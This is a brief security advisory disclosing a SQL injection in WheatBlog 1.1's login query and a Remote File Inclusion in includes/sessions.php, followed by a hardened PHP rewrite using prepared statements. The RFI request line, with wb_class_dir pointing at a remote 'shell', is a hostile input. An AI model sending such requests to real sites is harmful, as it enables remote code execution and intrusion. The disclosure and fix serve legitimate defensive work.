
WheatBlog 1.1 RFI/SQL Injection



Found by E.Minaev (underwater@itdefence.ru) 
ITDefence.ru 

1) SQL injection in the login function. This injection makes it possible to brute-force the table names of the blog's database character by character (magic_quotes_gpc should be turned off).

------------------------------------------
$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;
------------------------------------------

2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?
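
For item 1, one way to write the login check so that `$login` is bound as data and never becomes part of the SQL text. This is an added example, not WheatBlog's code; it assumes PDO with the SQLite driver, a hypothetical `wb_users` table, and passwords stored with `password_hash()`, which the original snippet does not use.

```php
<?php
// Added example: hardened rewrite of the login check; not WheatBlog's code.
// Assumptions: PDO with the sqlite driver, a hypothetical table wb_users,
// and passwords stored with password_hash() instead of plaintext.

// Fixed hash used when the login does not exist, so both paths do the same work.
define('DUMMY_HASH', password_hash('dummy', PASSWORD_DEFAULT));

function check_login(PDO $db, string $login, string $password): bool
{
    // The value is bound as data, so quotes in $login cannot alter the query,
    // whatever magic_quotes_gpc is set to.
    $stmt = $db->prepare('SELECT login, password FROM wb_users WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // fetch() returns false when no row matches.
    $hash = $row ? $row['password'] : DUMMY_HASH;
    $ok = password_verify($password, $hash);
    return $row !== false && $ok;
}

// Constructed test database held in memory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wb_users (login TEXT PRIMARY KEY, password TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO wb_users (login, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Constructed inputs: a valid login, a wrong password, and a login
// containing quote characters that would change the original query.
$cases = [
    ['admin', 'correct horse'],
    ['admin', 'wrong'],
    ["admin' OR '1'='1", 'anything'],
];
foreach ($cases as [$login, $password]) {
    $result = check_login($db, $login, $password) ? 'accepted' : 'rejected';
    printf("%-20s => %s\n", $login, $result);
}
```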
 
